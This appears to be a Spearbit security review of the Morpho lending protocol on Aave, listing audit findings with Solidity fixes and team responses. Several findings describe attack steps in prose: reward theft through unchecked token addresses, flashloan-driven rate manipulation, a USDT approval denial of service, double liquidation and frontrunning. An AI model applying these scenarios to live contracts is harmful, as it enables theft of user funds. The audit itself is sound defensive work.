For example, the _updateBorrowerInDS function calls _updateInDS and relies on the values of onPool and inP2P to understand if the user should be removed from or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } Let's assume that inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_THRESHOLD). In this case, _updateInDS would update those values to zero because 1 <= DUST_THRESHOLD and would remove the user from both the poolBuckets and p2pBuckets of the underlying. When the function then returns to the _updateBorrowerInDS context, the underlying would not be removed from the user's _userBorrows list of assets because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion can be drawn for all the "root"-level code that relies on the onPool and inP2P values that may not have been updated with the new 0 value set by _updateInDS. Recommendation: Consider "bubbling up" the updated values of both the onPool and inP2P variables from _updateInDS to be able to use the updated values also at the "root" level of the code. Morpho: Recommendation implemented in PR 626. Spearbit: Fixed. +5.4.2 There is no guarantee that the _rewardsManager is set when calling claimRewards Severity: Low Risk Context: Morpho.sol#L268 Description: Since the _rewardsManager address is set using a setter function in Morpho only, and not in the MorphoStorage.sol constructor, there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager. Recommendation: When calling claimRewards there should be a check that the rewardsManager is not address(0). Morpho: Fixed in PR 658. Spearbit: Fixed. +5.4.3 It's impossible to set _isClaimRewardsPaused Severity: Low Risk Context: Morpho.sol#L266 Description: The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean, so it is impossible to change. Recommendation: Add a setter function with the onlyOwner modifier that is able to set the _isClaimRewardsPaused value in storage (see the sketch after 5.4.4 below). Morpho: Fixed in PR 567. Spearbit: Fixed. +5.4.4 User rewards can be claimed to treasury by DAO Severity: Low Risk Context: Morpho.sol#L269, MorphoInternal.sol#L112 Description: When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract until all users have claimed their rewards. These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call. Recommendation: Consider tracking the reward balance, or pay attention when claiming fees to the treasury by setting the amounts parameter only to the accrued fees. Morpho: Yes, I don't think we'll add more logic for that since it would add lots of logic in the claimToTreasury function. Spearbit: Acknowledged.
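A minimal sketch of the setter recommended in 5.4.3 (the function and event names are illustrative assumptions, not necessarily the ones merged in PR 567):

function setIsClaimRewardsPaused(bool isPaused) external onlyOwner {
    // Flip the pause flag that claimRewards checks before claiming.
    _isClaimRewardsPaused = isPaused;
    emit Events.IsClaimRewardsPausedSet(isPaused); // illustrative event name
}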
5.5 Gas Optimization +5.5.1 decreaseDelta lib function should return early if amount == 0 Severity: Gas Optimization Context: MarketSideDeltaLib.sol#L55 Description: The passed-in amount should be checked for a zero value and, in that condition, the function should return early. As it currently is, it unnecessarily consumes more gas and emits change events for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function. Recommendation: Add a check if (amount == 0) return at the top of the decreaseDelta function. Morpho: Fixed in PR 600. Spearbit: Fixed. +5.5.2 Smaller gas optimizations Severity: Gas Optimization Context: See below Description: There are several small expressions that can be further gas optimized. Recommendation: Consider changing these: • MarketLib.sol#L219: The subtraction can be unchecked because of the if in the previous line. • MarketLib.sol#L244: An unchecked subtraction can be used instead of zeroFloorSub because matchedIdle = Math.min(idleSupply, amount) is at most idleSupply. • MorphoInternal.sol#L294: Consider using a less gas-intensive function that just retrieves underlyingPrice and tokenUnit without having to execute the rest of _assetLiquidityData, which is not useful in this function's context. That function could then be called internally by _assetLiquidityData and enhanced with the additional values needed. • MarketLib.sol#L209: Consider postponing the mul operation until after the check on the reserve.configuration.getSupplyCap() == 0 value. Morpho: Fixed in PR 654. Spearbit: Fixed. +5.5.3 Gas: Optimize LogarithmicBuckets.getMatch Severity: Gas Optimization Context: LogarithmicBuckets.sol#L72 Description: The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket than the bucket the provided value would be in. If no higher bucket is found, it searches for the highest bucket that "is in both bucketsMask and lowerMask." However, we already know that any bucket we can now find will be in lowerMask, as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask. Recommendation: Remove the lowerMask check and just return the highest bucket in the second step: function getMatch(Buckets storage _buckets, uint256 _value) internal view returns (address) { uint256 bucketsMask = _buckets.bucketsMask; if (bucketsMask == 0) return address(0); uint256 lowerMask = setLowerBits(_value); uint256 next = nextBucket(lowerMask, bucketsMask); if (next != 0) return _buckets.buckets[next].getHead(); uint256 prev = highestBucket(bucketsMask); return _buckets.buckets[prev].getHead(); } function highestBucket(uint256 bucketsMask) internal pure returns (uint256) { uint256 lowerBucketsMask = setLowerBits(bucketsMask); return lowerBucketsMask ^ (lowerBucketsMask >> 1); } Morpho: Fixed in PR 34. Spearbit: Fixed. 5.6 Informational +5.6.1 Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero Severity: Informational Context: PositionsManagerInternal.sol#L411-L426, PositionsManagerInternal.sol#L512 Description: In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of the _mintScaled and _burnScaled functions in the Aave codebase.
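For reference, this is the relevant check, paraphrased from Aave v3's ScaledBalanceTokenBase._mintScaled (the _burnScaled variant performs the symmetric check with Errors.INVALID_BURN_AMOUNT):

// Scale the supplied amount by the current liquidity index and reject dust
// that rounds down to a zero scaled balance.
uint256 amountScaled = amount.rayDiv(index);
require(amountScaled != 0, Errors.INVALID_MINT_AMOUNT);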
Morpho, with PR 688, has decided to prevent supplying to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken. With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in the specific context of the supplyCollateralLogic function will bring the following side effects: • The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. • The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex), which is equal to zero. • If marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underlying to Morpho), the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. • The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. • The Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user. Recommendation: Consider reverting the supplyCollateral and supplyCollateralWithPermit operations when amount.rayDivDown(poolSupplyIndex) is equal to zero. Morpho: We won't change the current code for the following reasons: • Rounding down allows doing the accounting in favor of the protocol instead of the user, which is the safer option. • The error is bounded by 1 wei of scaled balance and computations are already not precise to the wei (even for scaled balances). The index being in the order of magnitude of 1-10 RAY, the final error is bounded by 10 wei. • It's a bit annoying that the market would be added to the list of collaterals of the user, but I'd say that the user can easily prevent that by not supplying negligible amounts to Morpho (which do not make sense for a user anyway). Spearbit: Acknowledged. +5.6.2 WETHGateway does not validate the constructor's input parameters Severity: Informational Context: WETHGateway.sol#L31 Description: The current implementation of the WETHGateway contract does not validate the user's parameters in the constructor. In this specific case, the constructor should revert if the morpho address is equal to address(0). Recommendation: Morpho should add sanity checks on the user's input parameters, preventing the contract from being successfully created if they do not pass the validation. In this specific case, the constructor should revert if the morpho address is equal to address(0). Morpho: Recommendation implemented in PR 601. Spearbit: Verified. +5.6.3 Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful Severity: Informational Context: See below Description: In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec.
Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name: • RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance. • PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better documenting this part of the code because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. • MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from the MorphoInternal to the PositionsManagerInternal contract. This function is only used internally by PositionsManagerInternal. Note that there could be more instances of these kinds of "refactoring" of the code inside other contracts. Recommendation: Consider carefully updating/adding natspec for each function, event, struct, custom error, and state variable to have complete documentation of your code. This operation will be beneficial for Morpho developers, integrators and auditors. Consider also implementing the suggestions regarding the issues found in the current natspec or variable renaming. Morpho: Part of the recommendations have been implemented in PR 621. Spearbit: The Morpho team has stated that all the missing/wrong natspec comments will be handled in a different PR. The Morpho team should consider reviewing the codebase to find other possible functions that could be moved in this way to have a cleaner codebase. +5.6.4 No validation checks on the newDefaultIterations struct Severity: Informational Context: Morpho.sol#L49 Description: The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields. Recommendation: Consider validating at least a max value to avoid undesirable behavior if no matches occur in time. Morpho: We won't implement it. It's up to the governance to set relevant values. If Morpho is wrongly initialized it can still be updated later, and it's not clear what a correct "max value" would be either. Spearbit: Acknowledged. +5.6.5 No validation check for newPositionsManager address Severity: Informational Context: Morpho.sol#L48 Description: The initialize function does not ensure that the newPositionsManager is not a 0 address. Recommendation: Proper validation should be added to the newPositionsManager argument and the function should revert if it is indeed a 0 address. Morpho: We don't think it's worth it. Either the DAO can redeploy another instance of Morpho or set the positionsManager to the correct address later on using the setter. Spearbit: Acknowledged. +5.6.6 Missing Natspec function documentation Severity: Informational Context: PositionsManager.sol#L128-L132 Description: The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument. Recommendation: Natspec documentation should be added for the repayer function argument on the repayLogic function. Morpho: Fixed in PR 634. Spearbit: Fixed. +5.6.7 approveManagerWithSig user experience could be improved Severity: Informational Context: Morpho.sol#L250 Description: With the current implementation of approveManagerWithSig, signers must wait for the previous nonces to be consumed before being able to call approveManagerWithSig.
Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator; this means that signatures that use a "future" nonce cannot be approved until the previous nonces have been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: a delegator wants to allow 2 managers via signature. 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no one executes approveManagerWithSig(sig_0), then sig_1 (and all the signatures based on incremented nonces) cannot be executed. It's true that at some point someone/the signer will execute it. Recommendation: If this is an acceptable behavior, consider documenting it and explaining to the delegator the possible limitations of the process. Morpho: I believe that this should be considered intended behavior. Alternative behaviors create uncertainty as to what order signatures would be consumed in, and this could be problematic if, for example, a user has signatures for both approving and unapproving a manager. Spearbit: Acknowledged. +5.6.8 Consider hardcoding msg.sender as the from parameter for certain actions Severity: Informational Context: Morpho.sol#L283 Description: The following Morpho functions have a from field that is always set to msg.sender: _supply, _supplyCollateral, _repay (and liquidate's liquidator). Generally, a parameter that is always set to the same value does not need to be a parameter and can be hardcoded further down the call graph. However, this might make the code easier to understand in certain circumstances. In this case, we believe that removing the mentioned parameters and directly using msg.sender in the delegate-called PositionManager *Logic functions makes the code easier to reason about. The from parameter has important security considerations as it is used as the owner in an ERC20.transferFrom call and, unlike borrow or withdraw, does not validate this parameter with a _validatePermission call. Therefore these functions are only secure when called with from=msg.sender, and removing the parameter avoids having to analyze all call sites. Additionally, it will lead to gas improvements as the calldata is reduced. Morpho: The "from" parameter is quite useful if we want to implement something like meta transactions in the future, which is why we added it. We are not including this in the initial release, but we have talked about it internally at length and I don't think it's much extra gas to have this extra calldata that would make this potential feature much easier to implement. Spearbit: Acknowledged. +5.6.9 Missing user markets check when liquidating Severity: Informational Context: PositionsManager.sol#L238 Description: The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets. Recommendation: Instead of setting the repayment amount to zero and continuing with the zero liquidation, consider reverting if the user is not in the markets. Morpho: liquidateLogic now reverts when either the repaid or the seized amount is zero. Fixed in PR 629. Spearbit: Fixed.
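A minimal sketch of the guard recommended in 5.6.9, assuming the _userCollaterals/_userBorrows sets referenced elsewhere in the codebase and a hypothetical custom error:

// Revert early instead of proceeding with a zero liquidation when the borrower
// never joined the relevant markets.
if (
    !_userCollaterals[borrower].contains(underlyingCollateral)
        || !_userBorrows[borrower].contains(underlyingBorrowed)
) {
    revert Errors.UserNotMemberOfMarket(); // hypothetical error name
}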
+5.6.10 Consider reverting instead of returning zero inside the repayLogic, withdrawLogic, withdrawCollateralLogic and liquidateLogic functions Severity: Informational Context: PositionsManager.sol#L142, PositionsManager.sol#L174, PositionsManager.sol#L204, PositionsManager.sol#L249 Description: The position manager always checks the user inputs via different validation functions. One of the validations is that the input's amount must be greater than zero; otherwise, the transaction reverts with revert Errors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic, after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts is equal to zero. Recommendation: Consider reverting, with a specific error code for each case, even when the re-calculated amount is equal to zero, instead of simply returning zero. Morpho: Recommendation implemented in PR 629. Spearbit: Fixed. +5.6.11 PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max Severity: Informational Context: Morpho.sol#L90-L92, Morpho.sol#L121-L123, Morpho.sol#L166-L168, PositionsManager.sol#L62, PositionsManager.sol#L87, PositionsManager.sol#L144, PositionsManager.sol#L251 Description: Both Morpho.sol and PositionsManager.sol use the Permit2 lib. The current implementation of the permit2 lib explicitly restricts the token amount to uint160 by calling amount.toUint160(). On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib. Recommendation: Consider restricting the amount to uint160, or document the behavior as a natspec comment and in the documentation visible to users and integrators. Morpho: I don't think a fix for this is necessary as long as the transaction reverts properly. Spearbit: Acknowledged. +5.6.12 Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero Severity: Informational Context: WETHGateway.sol#L95, WETHGateway.sol#L100-L101 Description: Both _wrapETH and _unwrapAndTransferETH are not checking if the amount of tokens is greater than zero. If the amount is equal to zero, Morpho should avoid making the external call or simply revert. Recommendation: Avoid executing the external call to the WETH contract, or revert, if the amount is equal to zero. Morpho should anyway consider monitoring these events because each interaction with Morpho should always return an amount of tokens greater than zero. Morpho: The recommendation has been implemented in PR 655. Spearbit: Fixed. Morpho has decided to revert when the amount wrapped/unwrapped is equal to zero. In the integrator docs, Morpho should make the integrators aware of this behavior for borrowETH, withdrawETH, and withdrawCollateralETH. In those specific cases, the integrators have to handle the possible revert with a try/catch to not make the whole tx fail.
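As an illustration of the try/catch handling mentioned above (the gateway interface and argument list are assumed for illustration, not taken from the actual WETHGateway ABI):

// Integrator-side handling of a potentially zero-amount withdrawal.
try wethGateway.withdrawETH(amount, receiver) {
    // Withdrawal succeeded; continue with the integration logic.
} catch {
    // The gateway now reverts on zero wrapped/unwrapped amounts;
    // handle the failure here instead of letting the whole tx revert.
}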
+5.6.13 Document further constraints on BucketDLL's insert and remove functions Severity: Informational Context: BucketDLL.sol#L49, BucketDLL.sol#L67 Description: Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: • insert: "This function should not be called with an _id that is already in the list." Otherwise, it would overwrite the existing _id. • remove: "This function should not be called with an _id that is not in the list." Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty. Recommendation: Consider adding these two constraints as @dev comments next to the "This function should not be called with _id equal to address 0." constraint. /// @dev This function should not be called with `_id` equal to address 0. + /// @dev This function should not be called with an `_id` that is not in the list. function remove(List storage _list, address _id) internal returns (bool) { ... } /// @dev This function should not be called with `_id` equal to address 0. + /// @dev This function should not be called with an `_id` that is already in the list. function insert( List storage _list, address _id, bool _head ) internal returns (bool) { ... } Morpho: Addressed in PR 34. Spearbit: Fixed. diff --git a/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt new file mode 100644 index 0000000..e20af40 --- /dev/null +++ b/findings_newupdate/spearbit/Morpho-Spearbit-Security-Review.txt @@ -0,0 +1,41 @@ +5.1.1 Wrong P2P exchange rate calculation Severity: Critical Risk Context: MarketsManagerForAave.sol#L436 Description: _p2pDelta is divided by _poolIndex and multiplied by _p2pRate; nevertheless, it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta. This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved. Recommendation: Change the order and adjust return values accordingly. uint256 shareOfTheDelta = _p2pDelta .wadToRay() - .rayMul(_p2pRate) - .rayDiv(_poolIndex) + .rayMul(_poolIndex) + .rayDiv(_p2pRate) .rayDiv(_p2pAmount.wadToRay()); Morpho: Fixed in PR #536, _computeNewP2PExchangeRate is changed as recommended. Spearbit: Acknowledged. +5.1.2 MatchingEngineForAave is using the wrong totalSupply in updateBorrowers Severity: Critical Risk Context: MatchingEngineForAave.sol#L376-L385 Description: _poolTokenAddress is referencing the AToken, so totalStaked would be the total supply of the AToken. In this case, totalStaked should reference the total supply of the DebtToken; otherwise the user would be rewarded based on a wrong reward amount. Recommendation: Use the correct token address to query scaledTotalSupply as follows: address variableDebtTokenAddress = lendingPool .getReserveData(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS()) .variableDebtTokenAddress; uint256 totalStaked = IScaledBalanceToken(variableDebtTokenAddress).scaledTotalSupply(); Spearbit: Fixed, recommendation was implemented in PR #554. +5.1.3 RewardsManagerAave does not verify token addresses Severity: Critical Risk Context: RewardsManagerForAave.sol#L145-L147 Description: Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aave's incentive controller can define rewards for all of them, but Morpho never uses a stable-rate borrow token (sToken).
The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. The current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the user's supply balance for the reward calculation as follows: uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e.: • Attacker supplies a large amount of tokens for which sToken rewards are defined. • The aToken reward index is updated to the latest index but the sToken index is not initialized. • Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the current Aave reward index and the user's sToken index, then multiply it by their supply balance. • The user's accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionManager.claimRewards([sToken, ...]). • Attacker withdraws their supplied tokens again. The abovementioned steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions. Recommendation: Verify the token address to be either an aToken or vToken. function accrueUserUnclaimedRewards(address[] calldata _assets, address _user) { // ... for (uint256 i = 0; i < _assets.length; i++) { address asset = _assets[i]; DataTypes.ReserveData memory reserve = lendingPool.getReserveData( IGetterUnderlyingAsset(asset).UNDERLYING_ASSET_ADDRESS() ); - uint256 stakedByUser = reserve.variableDebtTokenAddress == asset - ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool - : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; + uint256 stakedByUser; + if (reserve.variableDebtTokenAddress == asset) { + stakedByUser = positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool; + } else { + require(reserve.aTokenAddress == asset, "invalid asset"); + stakedByUser = positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; + } // ... } } Morpho: Fixed, the recommendation has been implemented in PR #554. Spearbit: Acknowledged. 5.2 High Risk +5.2.1 FullMath requires overflow behavior Severity: High Risk Context: FullMath.sol#L2 Description: UniswapV3's FullMath.sol is copied and migrated from an old solidity version to version 0.8, which reverts on overflows, but the old FullMath relies on the implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract. Recommendation: Use the official FullMath.sol 0.8 branch that wraps the code in an unchecked statement. See #40. Spearbit: Fixed, the Uniswap V3 branch is added as a dependency in PR #550. +5.2.2 Morpho's USDT mainnet market can end up in broken state Severity: High Risk Context: PositionsManagerForAaveLogic.sol#L502 Description: Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool, it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore.
Example: Assume the attacker is first to borrow from the USDT market on Morpho. • Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). • Attacker directly interacts with Aave to repay 1 USDT of debt for Aave's Morpho account position. • Attacker attempts to repay 1000 USDT on Morpho. It will approve 1000 USDT, but the contract's debt balance is only 999 and the _amount = Math.min(_amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt)) computation will only repay 999. An approval of 1 USDT remains. • The USDT market is broken, as it reverts on supply / repay calls when trying to approve the new amount. Recommendation: In _repayERC20ToPool/_supplyERC20ToPool do a safeApprove(0) first before the approval, or ensure that the exact approved amount is always transferred by Aave, resetting the allowance to zero that way. Morpho: This is fixed (not in the closed PR). Now we approve only what will be paid to Aave and no more, so after repay the allowance will always be 0. Spearbit: Acknowledged. +5.2.3 Wrong reserve factor computation on P2P rates Severity: High Risk Context: MarketsManagerForAave.sol#L413-L418 Description: The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates. It's currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; Recommendation: Fix the computation. Morpho: The real reserve factor should apply only on the spread, so you're right that this formula is wrong and needs to be updated: a + (1/2 ± f)(b - a), where f is the reserve factor. Spearbit: Acknowledged, fixed in PR #565. +5.2.4 SwapManager assumes Morpho token is token0 of every token pair Severity: High Risk Context: SwapManagerUniV2.sol#L106 Description: The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> reward token pair. This could lead to inverted prices and a denial-of-service attack when claiming rewards, as the wrongly calculated expected amount slippage check reverts. Recommendation: Consider using code similar to the example UniswapV2 oracle. Note that depending on how this issue is fixed in consult, the caller of this function needs to be adjusted as well to return a Morpho token amount as amountOut. Morpho: Fixed in PR #585. Spearbit: Acknowledged. +5.2.5 SwapManager fails at updating TWAP Severity: High Risk Context: SwapManagerUniV2.sol#L83-L85 Description: The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. Meaning, once the TWAP period has passed, the TWAP is stale and forever represents an old value. This could lead to a denial-of-service attack when claiming rewards, as the wrongly calculated expected amount slippage check reverts. Recommendation: Fix the code: // ensure that at least one full period has passed since the last update - if (timeElapsed >= PERIOD) { + if (timeElapsed < PERIOD) { return; } Morpho: Fixed in PR #550 Spearbit: Acknowledged.
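A minimal sketch of the token-ordering handling needed for 5.2.4, relying on the UniswapV2 convention that a pair stores the lexicographically smaller address as token0 (the pair variable is an assumed IUniswapV2Pair handle):

// Determine which token the pair treats as token0 instead of assuming MORPHO is.
address token0 = MORPHO < REWARD_TOKEN ? MORPHO : REWARD_TOKEN;
// price0CumulativeLast accumulates the price of token0 denominated in token1
// (and vice versa), so pick the accumulator where the reward token is the base
// to quote MORPHO per reward token.
uint256 priceCumulative = token0 == REWARD_TOKEN
    ? pair.price0CumulativeLast()
    : pair.price1CumulativeLast();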
+5.2.6 P2P rate can be manipulated as it's a lazy-updated snapshot Severity: High Risk Context: MarketsManagerForAave.sol#L408-L411 Description: The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of the current Aave supply and borrow rate. It's possible to manipulate these rates before triggering an update on Morpho. function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: • Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral.) • The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. • The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool, PositionsManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTokenAddress). • The new mid-rate is computed, which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBorrowRate. • The attacker repays their Aave debt in the same transaction, not paying any interest on it. • All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. • This process can be repeated to keep the APY high. Recommendation: Consider using a time-weighted mid-rate instead of trusting the current value. Create an oracle contract that is triggered by the protocol administrators to compute the running TWAR (Time-Weighted-Average-Rate) of Aave. Also, ensure that the P2P rate used by the protocol is updated often (updateSPYs) to not diverge from the Aave pool rate. This can be bad in low-activity markets where a high APY is locked in and no P2P rate update is triggered for a long time period. Morpho: How can this kind of attack be profitable if there is a bot that updates rates after such a tx? I mean, it can only be a griefing attack, right? In the case the user has enough capital to harm Morpho, the user only needs to pay the gas of the tx, nothing else, so it would end up in the same situation, no? The drawback of a TWAP would be to desynchronize Morpho from the real P2P rate, which can lead to other major issues. Spearbit: You can't assume that there isn't such a bot, and even if there is, you can't assume that the sync always perfectly ends up in the same block as the attack transaction. Even if the syncing ends up in the next block, you'd still pay high interest for 1 block. This attack only costs gas fees; they can take 0%-fee flashloans (flashmint DAI, turn it to aDAI supply) and then borrow against it. The borrow also doesn't come with any interest because it's repaid in the same block. It's a griefing attack if the attacker does not have their own supply position on Morpho, but as soon as they have a supply position it's very likely to be profitable because they only pay gas fees but earn a high APR. Morpho's P2P rate is already different from the real Aave mid-rate because it isn't updated every block to reflect changes in Aave's mid-rate.
(That’s what I mean by lazy-updated snapshot and "Also, ensure that the P2P rate the protocol uses is updated often (updateSPYs) to not diverge from the Aave pool rate.") It doesn’t actually have to be time-weighted, it could just be an oracle that also stores the current aave mid-rate but these updates couldn’t be manipulated by an attacker as they can only be triggered by admins. Morpho: We are working on a completely new way to manage exchanges rates. The idea is to delete Morpho’s midrate, and update our exchange rates with a formula that only depends on the pool’s exchanges rates (and not the rate, to avoid manipulations). Associated fix in #PR 601. Spearbit: Acknowledged. +5.2.7 Liquidating Morpho’s Aave position leads to state desynchronization Severity: High Risk Context: PositionsManagerForAaveGettersSetters.sol#L208-L219 Description: Morpho has a single position on Aave that encompasses all of Morpho’s individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desynchronize from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It’s also possible to double-liquidate for a profit. Example: There’s a single borrower B1 on Morpho who is connected to the Aave pool. • B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho • The ETH price crashes and the position becomes liquidatable. • A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. • This repaid debt / removed collateral is not synced with Morpho. The user’s supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. • The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. • The state remains desynced. Recommendation: Liquidating the Morpho position should not break core functionality for Morpho users. Morpho: This issue can be prevented by sending, at the beginning at least, aTokens on behalf of Morpho and set it as collateral to prevent this issue. Also we will run our own liquidation bots. We will not implement any "direct" fix inside the code. Spearbit: Acknowledged, no direct fixes have been implemented. 10 5.3 Medium Risk +5.3.1 Frontrunners can exploit the system by not allowing head of DLL to match in P2P Severity: Medium Risk Context: MatchingEngineForAave.sol Description: For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x Whenever there is a new transaction in the mempool to borrow 100 units of x: • Frontrunner supplies 1001 units of x and is supplied on pool. • updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). • Borrower’s transaction lands and is matched 100 units of x with a frontrunner in p2p. • Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: • Relatively fewer gas fees & relatively high block gas limit. • insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block’s time period. Recommendation: Consider sandwich attack mitigations. 
+5.3.2 TWAP intervals should be flexible as per market conditions

Severity: Medium Risk
Context: SwapManagerUniV3.sol#L140-L149
Description: The protocol is using the same TWAP_INTERVAL for both the weth-morpho and weth-reward token pools, while their liquidity and activity might be different. It should use separate appropriate values for both pools.

Recommendation: The TWAP_INTERVAL value should be changeable (and not constant) by the admin/owner, since it is dependent upon market conditions and activity (e.g. a 1-hour TWAP might lag considerably in sudden movements). A setter is sketched below.

Morpho: Valid issue, will fix.

Spearbit: Recommendation has been followed in PR #557.
